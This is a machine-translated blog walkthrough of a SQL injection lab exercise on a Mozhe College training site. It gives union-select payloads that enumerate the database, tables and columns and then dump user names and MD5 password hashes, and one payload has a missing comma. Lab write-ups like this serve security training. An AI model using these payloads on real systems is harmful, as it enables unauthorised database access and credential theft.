当前位置:网站首页>Mozi college SQL injection solution
Mozi college SQL injection solution
2020-11-08 09:40:00 【osc_7bgz0no1】
One · Judgment injection
Input id=1, Normal return . Input id=-1 Returns an error . from This shows that there is injection .
Two · Judgment fields
URL id=-1 order by 1
URL id=-1 order by 2
URL id=-1 order by 3
URL id=-1 order by 4
URL id=-1 order by 5 An error at this time , The description has four fields
3、 ... and · Use union Query injection point
Input union select 1,2,3,4
Find out 2,3 For the obvious note point
Four · Use database() Chaku name
Input union select 1,database(),3,4
Find out the name of the library mozhe_Discuz_StormGroup
5、 ... and · Look up the name of the table
Input
union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’
Query to StormGroup_member,notice
See member, So doubt about the first one . So first look up the first .
6、 ... and · Inquire about StormGroup_member The fields stored in the
Input
union select 1,group_concat(column_name)3,4 from information_schema.columns where table_name=‘StormGroup_member’
Query out id,name,password,status
7、 ... and · Query password and user name
union select 1,group_concat(name,0x3a,password),3,4 from StormGroup_member
obtain md5 Encrypted value . To decrypt , Get the code .
If the password is wrong , adopt limit m,n To continue with the inquiry .
8、 ... and · Submit key
After getting the password, you can see key, Copy , Submit .
版权声明
本文为[osc_7bgz0no1]所创,转载请带上原文链接,感谢
边栏推荐
- 5g/4g工业无线路由器
- 成功解决An error ocurred while starting the kernel
- Julia 是如何风靡起来的?
- 接口
- Improvement of rate limit for laravel8 update
- Python3.9的7个特性
- How does spotify drive data-driven decision making?
- 你搞不懂与别人的差距,永远成不了架构师!月薪15K和月薪65K,你差在那了?
- The most detailed usage guide for perconaxtradbcluster8.0
- Six key points of data science interview
猜你喜欢
Unparseable date: 'Mon Aug 15 11:24:39 CST 2016',时间格式转换异常
“1024”征文活动结果新鲜出炉!快来看看是否榜上有名?~~
Seven features of Python 3.9
PX4添加新的应用
解决RabbitMQ消息丢失与重复消费问题
SQL Server 2008R2 18456错误解决方案
Can you do it with only six characters?
iOS上传App Store报错:this action cannot be completed -22421 解决方案
年轻一代 winner 的程序人生,改变世界的起点藏在身边
413【毕设课设】基于51单片机无线zigbee无线智能家居光照温湿度传输监测系统
随机推荐
Visual studio 2015 unresponsive / stopped working problem resolution
归纳一些比较好用的函数
python_ scrapy_ Fang Tianxia
Architect (November 2020)
Close to the double 11, he made up for two months and successfully took the offer from a large factory and transferred to Alibaba
Deeplight Technology Bluetooth protocol SRRC certification services
2020-11-05
ASP.NET A complete solution based on exception handling in MVC
搜索引擎的日常挑战_4_外部异构资源 - 知乎
盘点那些你没想到的云计算应用场景(上)
Windows下子系统Ubuntu安装
If you don't understand the gap with others, you will never become an architect! What's the difference between a monthly salary of 15K and a monthly salary of 65K?
2020-11-05
Cloud Alibabab笔记问世,全网详解仅此一份手慢无
Codeforce算法题 | 你能想出解法,让你的基友少氪金吗?
Distributed consensus mechanism
Astra: Apache Cassandra的未来是云原生
哔哩哔哩常用api
Which is more worth starting with the difference between vivos7e and vivos7
Is blazor ready to serve the enterprise?